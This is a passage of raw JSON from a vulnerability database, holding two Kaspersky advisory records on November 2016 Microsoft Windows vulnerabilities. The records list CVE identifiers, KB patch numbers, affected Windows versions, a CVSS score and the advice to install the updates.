\n[CVE-2016-7205](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7205>)0.0Unknown \n[CVE-2016-7210](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7210>)0.0Unknown \n[CVE-2016-7212](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7212>)0.0Unknown \n[CVE-2016-7214](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7214>)0.0Unknown \n[CVE-2016-7215](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7215>)0.0Unknown \n[CVE-2016-7216](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7216>)0.0Unknown \n[CVE-2016-7218](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7218>)0.0Unknown 
\n[CVE-2016-7221](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7221>)0.0Unknown\n\n### *KB list*:\n[3181707](<http://support.microsoft.com/kb/3181707>) \n[3193418](<http://support.microsoft.com/kb/3193418>) \n[3194371](<http://support.microsoft.com/kb/3194371>) \n[3196718](<http://support.microsoft.com/kb/3196718>) \n[3197867](<http://support.microsoft.com/kb/3197867>) \n[3197868](<http://support.microsoft.com/kb/3197868>) \n[3198234](<http://support.microsoft.com/kb/3198234>) \n[3198483](<http://support.microsoft.com/kb/3198483>) \n[3198510](<http://support.microsoft.com/kb/3198510>) \n[3203859](<http://support.microsoft.com/kb/3203859>) \n[3197655](<http://support.microsoft.com/kb/3197655>) \n[3203621](<http://support.microsoft.com/kb/3203621>)\n\n### *Microsoft official advisories*:", "edition": 1, "modified": "2020-07-22T00:00:00", "published": "2016-11-08T00:00:00", "id": "KLA11832", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11832", "title": "\r KLA11832Multiple vulnerabilities in Microsoft Products (ESU) ", "type": "kaspersky", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-02T11:42:14", "bulletinFamily": "info", "cvelist": ["CVE-2016-7221", "CVE-2016-7184", "CVE-2016-3338", "CVE-2016-3334", "CVE-2016-7216", "CVE-2016-7237", "CVE-2016-7246", "CVE-2016-7248", "CVE-2016-3335", "CVE-2016-7218", "CVE-2016-7217", "CVE-2016-7247", "CVE-2016-7210", "CVE-2016-7214", "CVE-2016-3343", "CVE-2016-3333", "CVE-2016-7202", "CVE-2016-7223", "CVE-2016-7225", "CVE-2016-0026", "CVE-2016-7205", "CVE-2016-7256", "CVE-2016-7222", "CVE-2016-7238", "CVE-2016-3332", "CVE-2016-7224", "CVE-2016-7226", "CVE-2016-7255", "CVE-2016-3342", "CVE-2016-7215", "CVE-2016-7220", "CVE-2016-7212", "CVE-2016-3340"], "description": "### *Detect date*:\n11/08/2016\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Windows. 
Malicious users can exploit these vulnerabilities to execute arbitrary code, gain privileges, bypass security restrictions, cause denial of service, or obtain sensitive information.\n\n### *Affected products*:\nWindows 7 for 32-bit Systems Service Pack 1 \nWindows 10 Version 1511 for 32-bit Systems \nWindows Vista Service Pack 2 \nWindows 7 for x64-based Systems Service Pack 1 \nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows Server 2008 R2 for Itanium-Based Systems Service Pack 1 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nWindows Server 2012 R2 (Server Core installation) \nWindows 10 Version 1511 for x64-based Systems \nWindows 8.1 for 32-bit systems \nWindows Server 2012 \nWindows RT 8.1 \nWindows 10 Version 1607 for x64-based Systems \nWindows 10 for 32-bit Systems \nWindows Server 2012 (Server Core installation) \nMicrosoft Windows Hyperlink Object Library \nWindows Server 2016 \nWindows 10 Version 1607 for 32-bit Systems \nWindows Server 2016 (Server Core installation) \nWindows Server 2012 R2 \nWindows 10 for x64-based Systems \nWindows Server 2008 for x64-based Systems Service Pack 2 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows Vista x64 Edition Service Pack 2 \nWindows Server 2008 for Itanium-Based Systems Service Pack 2 \nWindows 8.1 for x64-based systems\n\n### *Solution*:\nInstall the necessary updates from the KB section that are listed in your Windows Update (Windows Update can usually be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2016-7202](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-7202>) \n[CVE-2016-7256](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-7256>) 
\n[CVE-2016-7255](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-7255>) \n[CVE-2016-7248](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-7248>) \n[CVE-2016-7247](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-7247>) \n[CVE-2016-7246](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-7246>) \n[CVE-2016-7238](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-7238>) \n[CVE-2016-7237](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-7237>) \n[CVE-2016-0026](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-0026>) \n[CVE-2016-3332](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-3332>) \n[CVE-2016-3333](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-3333>) \n[CVE-2016-3334](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-3334>) \n[CVE-2016-3335](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-3335>) \n[CVE-2016-3338](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-3338>) \n[CVE-2016-3340](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-3340>) \n[CVE-2016-3342](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-3342>) \n[CVE-2016-3343](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-3343>) \n[CVE-2016-7184](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-7184>) \n[CVE-2016-7205](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-7205>) \n[CVE-2016-7210](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-7210>) \n[CVE-2016-7212](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-7212>) 
\n[CVE-2016-7214](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-7214>) \n[CVE-2016-7215](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-7215>) \n[CVE-2016-7216](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-7216>) \n[CVE-2016-7217](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-7217>) \n[CVE-2016-7218](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-7218>) \n[CVE-2016-7220](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-7220>) \n[CVE-2016-7221](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-7221>) \n[CVE-2016-7222](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-7222>) \n[CVE-2016-7223](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-7223>) \n[CVE-2016-7224](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-7224>) \n[CVE-2016-7225](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-7225>) \n[CVE-2016-7226](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-7226>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Windows](<https://threats.kaspersky.com/en/product/Microsoft-Windows/>)\n\n### *CVE-IDS*:\n[CVE-2016-7202](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7202>)0.0Unknown \n[CVE-2016-7256](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7256>)0.0Unknown \n[CVE-2016-7255](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7255>)0.0Unknown \n[CVE-2016-7248](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7248>)0.0Unknown \n[CVE-2016-7247](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7247>)0.0Unknown \n[CVE-2016-7246](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7246>)0.0Unknown 
\n[CVE-2016-7238](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7238>)0.0Unknown \n[CVE-2016-7237](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7237>)0.0Unknown \n[CVE-2016-0026](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0026>)0.0Unknown \n[CVE-2016-3332](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3332>)0.0Unknown \n[CVE-2016-3333](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3333>)0.0Unknown \n[CVE-2016-3334](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3334>)0.0Unknown \n[CVE-2016-3335](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3335>)0.0Unknown \n[CVE-2016-3338](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3338>)0.0Unknown \n[CVE-2016-3340](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3340>)0.0Unknown \n[CVE-2016-3342](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3342>)0.0Unknown \n[CVE-2016-3343](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3343>)0.0Unknown \n[CVE-2016-7184](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7184>)0.0Unknown \n[CVE-2016-7205](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7205>)0.0Unknown \n[CVE-2016-7210](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7210>)0.0Unknown \n[CVE-2016-7212](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7212>)0.0Unknown \n[CVE-2016-7214](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7214>)0.0Unknown \n[CVE-2016-7215](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7215>)0.0Unknown \n[CVE-2016-7216](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7216>)0.0Unknown \n[CVE-2016-7217](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7217>)0.0Unknown \n[CVE-2016-7218](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7218>)0.0Unknown \n[CVE-2016-7220](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7220>)0.0Unknown 
\n[CVE-2016-7221](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7221>)0.0Unknown \n[CVE-2016-7222](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7222>)0.0Unknown \n[CVE-2016-7223](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7223>)0.0Unknown \n[CVE-2016-7224](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7224>)0.0Unknown \n[CVE-2016-7225](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7225>)0.0Unknown \n[CVE-2016-7226](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7226>)0.0Unknown\n\n### *Microsoft official advisories*:\n\n\n### *KB list*:\n[3200970](<http://support.microsoft.com/kb/3200970>) \n[3181707](<http://support.microsoft.com/kb/3181707>) \n[3193418](<http://support.microsoft.com/kb/3193418>) \n[3194371](<http://support.microsoft.com/kb/3194371>) \n[3196718](<http://support.microsoft.com/kb/3196718>) \n[3197873](<http://support.microsoft.com/kb/3197873>) \n[3197874](<http://support.microsoft.com/kb/3197874>) \n[3197876](<http://support.microsoft.com/kb/3197876>) \n[3197877](<http://support.microsoft.com/kb/3197877>) \n[3198218](<http://support.microsoft.com/kb/3198218>) \n[3198234](<http://support.microsoft.com/kb/3198234>) \n[3198483](<http://support.microsoft.com/kb/3198483>) \n[3198510](<http://support.microsoft.com/kb/3198510>) \n[3198585](<http://support.microsoft.com/kb/3198585>) \n[3198586](<http://support.microsoft.com/kb/3198586>) \n[3203859](<http://support.microsoft.com/kb/3203859>) \n[3208481](<http://support.microsoft.com/kb/3208481>)\n\n### *Exploitation*:\nThe following public exploits exist for this vulnerability:", "edition": 45, "modified": "2020-07-22T00:00:00", "published": "2016-11-08T00:00:00", "id": "KLA10897", "href": "https://threats.kaspersky.com/en/vulnerability/KLA10897", "title": "\r KLA10897Multiple vulnerabilities in Microsoft Windows ", "type": "kaspersky", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}]}